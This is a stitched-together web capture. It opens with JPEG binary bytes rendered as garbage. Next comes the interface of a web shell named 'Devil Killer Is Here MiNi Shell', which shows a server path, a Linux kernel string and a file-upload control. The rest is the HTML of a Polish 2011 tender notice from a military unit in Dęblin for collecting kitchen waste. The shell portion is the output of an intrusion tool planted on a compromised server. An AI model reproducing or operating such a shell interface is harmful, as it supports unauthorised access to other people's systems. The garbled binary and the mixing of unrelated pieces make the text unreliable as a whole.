JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111212/422118-N-2011.html

<p class="kh_header"><b>Dęblin: Wykonanie usługi odbioru, transportu, odzysku lub unieszkodliwiania odpadów kuchennych ulegających biodegradacji - kod odpadu 20 01 08 z terenów administrowanych przez Jednostkę Wojskową Nr 4219 w Dęblinie  kompleksy wojskowe  Lotnisko, Twierdza - Nr 82/11/N,</b><br>
<b>Numer ogłoszenia: 422118 - 2011; data zamieszczenia: 12.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi odbioru, transportu, odzysku lub unieszkodliwiania odpadów kuchennych ulegających biodegradacji - kod odpadu 20 01 08 z terenów administrowanych przez Jednostkę Wojskową Nr 4219 w Dęblinie  kompleksy wojskowe  Lotnisko, Twierdza - Nr 82/11/N,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi odbioru, transportu, odzysku lub unieszkodliwiania odpadów kuchennych ulegających biodegradacji pochodzących ze stołówek żołnierskich kod odpadu 20 01 08 zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów  Dz. U z 2001 r. Nr 112, poz. 1206 z terenu kompleksów wojskowych administrowanych przez Jednostkę Wojskową Nr 4219 w Dęblinie kompleksy: Lotnisko Dęblin, Twierdza Dęblin wg tabeli nr 1. Przedmiotowe odpady stanowią jednocześnie materiał kategorii III, wg. Rozporządzenia Parlamentu Europejskiego i Rady WE nr 1069/2009 z dnia 21 października 2009 r. określające przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie WE nr 1772 2002 rozporządzenie o produktach ubocznych pochodzenia zwierzęcego. 
Zakres przedmiotu zamówienia
1. W ramach zamówienia Wykonawca dokonywał będzie odbioru, transportu, odzysku lub unieszkodliwiania odpadów dopuszcza się możliwość aby Wykonawca przekazywał odpady do odzysku lub unieszkodliwiania wyspecjalizowanej firmie na mocy stosownej umowy. Usługa stanowiąca przedmiot zamówienia świadczona będzie w okresie od 01.01.2012 r. do 15.12.2012 r.
2. Wykonawca dodatkowo zapewni użyczając Zamawiającemu odpowiednie pojemniki na ich magazynowanie. Użyczone pojemniki powinny być sprawne technicznie, estetyczne, odporne na działanie czynników zewnętrznych, wykonane z tworzywa sztucznego, posiadać możliwość ich szczelnego, hermetycznego zamknięcia oraz posiadać powinny uchwyty (wgłębienia) umożliwiające ich podnoszenie. 
3. Wykonawca dostarczy (użyczy)  Zamawiającemu w poszczególnych miejscach wytwarzania odpadów, następujące rodzaje pojemników do ich magazynowania:
na terenie kompleksu wojskowego Lotnisko Dęblin, w budynku nr 219 (stołówka żołnierska) - beczki, szczelnie zamykane, wykonane z tworzywa sztucznego o pojemności 60 l,
na terenie kompleksu wojskowego  Lotnisko Dęblin, w budynku nr 6 stołówka żołnierska  beczki, szczelnie zamykane, wykonane z tworzywa sztucznego o pojemności 60 l,
 na terenie kompleksu wojskowego Twierdza Dęblin, w budynku nr 111 stołówka żołnierska pojemniki mobilne, wyposażone w dwa kółka, szczelnie zamykane, wykonane z tworzywa sztucznego o pojemności 120 l.
4. Wymagana ilość pojemników każdego rodzaju zostanie ustalona telefonicznie pomiędzy Zamawiającym a Wykonawcą przed  pierwszym odbiorem odpadów.
5. Ilość pojemników poszczególnych rodzajów użyczonych Zamawiającemu może ulec zmniejszeniu lub zwiększeniu w trakcie trwania umowy. Wykonawca nie będzie rościł żadnych pretensji z tego tytułu do Zamawiającego.
6. Pojazdy i pojemniki wielokrotnego użytku, a także wszystkie pozostałe elementy wyposażenia lub sprzęt wielokrotnego użytku, które stykają się z produktami ubocznymi pochodzenia zwierzęcego lub produktami przetworzonymi, muszą:

zostać wyczyszczone, wymyte i zdezynfekowane po każdym użyciu;
być utrzymane w czystości;
być czyste i suche przed użyciem.

7. Wykonawca zobowiązuje się do odbierania odpadów od Zamawiającego trzy razy w tygodniu, w poniedziałek, środę i piątek lub w szczególnych przypadkach na telefoniczne wezwanie Zamawiającego.
8.Wykonawca zobowiązuje się do odbierania odpadów od Zamawiającego w godzinach pracy Zamawiającego tj. od 800 do 1500 od poniedziałku do piątku a jeżeli odbiór przypada na dzień świąteczny, odbiór nastąpi w pierwszy dzień roboczy przypadający po dniu świątecznym. 
9.W przypadku odbioru odpadów na telefoniczne wezwanie Zamawiającego, odbiór będzie następował nie później niż w ciągu 48 godzin od telefonicznego zgłoszenia przez Zamawiającego.
10.Każdorazowe przekazanie odpadów odbywać się będzie na podstawie karty przekazania odpadów, wystawionej przez Zamawiającego, podpisanej przez Wykonawcę lub osobę  upoważnioną do reprezentowania Wykonawcy. Na koniec każdego miesiąca kalendarzowego zostanie wystawiona przez Zamawiającego zbiorcza karta przekazania odpadów.
11.Dokładna ilość odbieranych odpadów kuchennych ulegających biodegradacji zostanie każdorazowo określona w trakcie ich odbioru w wyniku ważenia.
12.Ilość odbieranych odpadów może ulec zmniejszeniu lub zwiększeniu w trakcie trwania umowy. Wykonawca nie będzie rościł żadnych pretensji z tego tytułu do Zamawiającego.
13.Ze względu na trudności z określeniem dokładnych ilości odpadów przewidzianych do odbioru Zamawiający zastrzega sobie, że podane ilości w formularzu ofertowym służą jedynie do zapoznania się Wykonawców z przybliżonymi ilościami odpadów.
14.Wykonawca po każdorazowym odbiorze pojemników z odpadami pozostawi nowe czyste zdezynfekowane pojemniki celem dalszego magazynowania odpadów. 
15.Ilość pojemników ma zapewnić Zamawiającemu swobodne magazynowanie odpadów do dnia ponownego ich odbioru przez Wykonawcę. 
16.Wykonawca oświadcza załącznik nr 1, że w szczególnie uzasadnionych przypadkach m.in. szkolenie poligonowe, szkolenie rezerw osobowych, osiągnięcia wyższych stanów gotowości bojowej, zagwarantuje użyczenie pojemników i odbiór odpadów z miejsc stacjonowania jednostek wojskowych i miejsc szkoleń poligonowych wskazanych przez Zamawiającego. 
17.Wykonawca powinien posiadać wymagane prawem uprawnienia do wykonywania działalności odpowiadającej przedmiotowi zamówienia  jeżeli obowiązujące przepisy nakładają taki obowiązek a mianowicie:
decyzje właściwych urzędów administracji państwowej na prowadzenie działalności  w zakresie transportu odpadów, zbierania odpadów oraz jeżeli Wykonawca sam dokonuje odzysku lub unieszkodliwiania odpadów na odzysk lub unieszkodliwianie odpadów zgodnie z obowiązującymi przepisami prawa w tym zakresie - wymagane kopie decyzji potwierdzone za zgodność oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy,
decyzję właściwego organu Inspekcji Weterynaryjnej na przewóz materiału kategorii III określonymi środkami transportu drogowego, na podstawie Ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczania chorób zakaźnych (Dz. U. z 2008 r. Nr 213, poz. 1342, z póź. zm.) oraz Rozporządzenia Parlamentu Europejskiego i Rady WE nr 1069 2009  z dnia 21 października 2009 r. określającego przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie WE nr 1772 2002 rozporządzenie o produktach ubocznych pochodzenia zwierzęcego  wymagana kopia decyzji potwierdzona za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy,
decyzję właściwego organu Inspekcji Weterynaryjnej nadającą numer identyfikacyjny na prowadzenie działalności gospodarczej polegającej na transporcie materiału kategorii III, tj. ubocznych produktów pochodzenia zwierzęcego, na podstawie Ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczania chorób zakaźnych Dz. U. z 2008 r. Nr 213, poz. 1342, z póź. zm. oraz Rozporządzenia Parlamentu Europejskiego i Rady WE nr 1069 2009 z dnia 21 października 2009 r. określające przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie WE nr 1772 2002 rozporządzenie o produktach ubocznych pochodzenia zwierzęcego wymagane kopia decyzji potwierdzona za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy. 
18.Wykonawca oświadcza, że przekazywać będzie odpady do najbliżej położonych miejsc, w których mogą być one poddane odzyskowi lub unieszkodliwione zgodnie z art. 9, ust. 2. Ustawy z dnia 27 kwietnia 2001 roku  o odpadach tekst jednolity Dz. U. z 2010 roku, Nr 185,  poz.1243 z późn. zm. załącznik nr 2 a 
19.W przypadku kiedy Wykonawca przekazuje odpady do odzysku lub unieszkodliwiania wyspecjalizowanej firmie zobowiązany jest podpisać oświadczenie, w którym oświadcza, że posiada aktualną umowę z zakładem odzysku lub unieszkodliwiania przedmiotowych odpadów, posiadającym wymagane przepisami prawa zezwolenia na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów o kodzie  20 01 08 stanowiących materiał kategorii III - załącznik nr 3.
20. Wykonawca oświadcza, że spełnia warunki określone w Rozporządzeniu Parlamentu Europejskiego i Rady (WE) nr 1069/2009  z dnia 21 października 2009 r. określające przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie WE nr 1772 2002 rozporządzenie o produktach ubocznych pochodzenia zwierzęcego załącznik nr 4 a 
21.Wykonawca powinien posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania przedmiotu  zamówienia.
22. Za świadczoną usługę Zamawiający zapłaci Wykonawcy kwotę brutto, którą stanowić będzie iloczyn rzeczywistych ilości odebranych przez Wykonawcę kg odpadów i ceny jednostkowej za każdy kg odebranych odpadów. 
23.Cena jednostkowa brutto za odbiór 1 kg odpadów obejmuje wszystkie koszty związane z realizacją przedmiotu zamówienia.
24.Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia wystąpi z wnioskiem do Zamawiającego o wydanie przepustek na wejście na teren kompleksów wojskowych Lotnisko i Twierdza Dęblin dla pracowników realizujących przedmiot zamówienia podając ich imiona i nazwiska oraz nr i serie dowodów tożsamości  a także o wydanie przepustek na wjazd pojazdów wykorzystywanych do realizacji przedmiotu zamówienia podając ich markę i numery.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnia wykonawcy posiadający
decyzje właściwych urzędów administracji państwowej na prowadzenie działalności  w zakresie transportu odpadów, zbierania odpadów oraz jeżeli Wykonawca sam dokonuje odzysku lub unieszkodliwiania odpadów na odzysk lub unieszkodliwianie odpadów zgodnie z obowiązującymi przepisami prawa w tym zakresie  wymagane kopie decyzji potwierdzone za zgodność oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy,
decyzję właściwego organu Inspekcji Weterynaryjnej na przewóz materiału kategorii III określonymi środkami transportu drogowego, na podstawie Ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczania chorób zakaźnych (Dz. U. z 2008 r. Nr 213, poz. 1342, z póź. zm.) oraz Rozporządzenia Parlamentu Europejskiego i Rady (WE) nr 1069/2009  z dnia 21 października 2009 r. określającego przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie (WE) nr 1772/2002 (rozporządzenie o produktach ubocznych pochodzenia zwierzęcego) - wymagana kopia decyzji potwierdzona za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy,
- decyzję właściwego organu Inspekcji Weterynaryjnej nadającą numer identyfikacyjny na prowadzenie działalności gospodarczej polegającej na transporcie materiału kategorii III, tj. ubocznych produktów pochodzenia zwierzęcego, na podstawie Ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczania chorób zakaźnych (Dz. U. z 2008 r. Nr 213, poz. 1342, z póź. zm.) oraz Rozporządzenia Parlamentu Europejskiego i Rady (WE) nr 1069/2009 z dnia 21 października 2009 r. określające przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie (WE) nr 1772/2002 (rozporządzenie o produktach ubocznych pochodzenia zwierzęcego) - wymagane kopia decyzji potwierdzona za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy. 
W przypadku kiedy Wykonawca przekazuje odpady do odzysku lub unieszkodliwiania wyspecjalizowanej firmie zobowiązany jest podpisać oświadczenie, w którym oświadcza, że posiada aktualną umowę z zakładem odzysku lub unieszkodliwiania przedmiotowych odpadów, posiadającym wymagane przepisami prawa zezwolenia na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów o kodzie  20 01 08 stanowiących materiał kategorii III załącznik nr 3.
20. Wykonawca oświadcza, że spełnia warunki określone w Rozporządzeniu Parlamentu Europejskiego i Rady WE nr 1069 2009  z dnia 21 października 2009 r. określające przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie WE nr 1772 2002</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy którzy w okresie trzech ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, należycie wykonali lub wykonują usługi odbioru, transportu, odzysku lub unieszkodliwiania odpadów kuchennych ulegających biodegradacji - kod odpadu 20 01 08 , (co najmniej jedna usługę - odbioru, transportu, odzysku lub unieszkodliwiania odpadów kuchennych ulegających biodegradacji - kod odpadu 20 01 08) z załączeniem dokumentu potwierdzającego, że usługa ta została wykonana należycie.  należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunków dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń  określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunków dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń  określonych w części VI siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunków dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń  określonych w części VI siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca może polegać na wiedzy, doświadczeniu, potencjale technicznym osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany jest do przedstawienia Zamawiającemu, iż będzie dysponował zasobami potrzebnymi do realizacji niniejszego zamówienia, a w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia. W takim przypadku zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany przepisów podatkowych dotyczących zmiany stawki podatku VAT Zamawiający dopuszcza zmianę umowy dotyczącą zmiany w zakresie stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wog.wp.mil.pl<br>
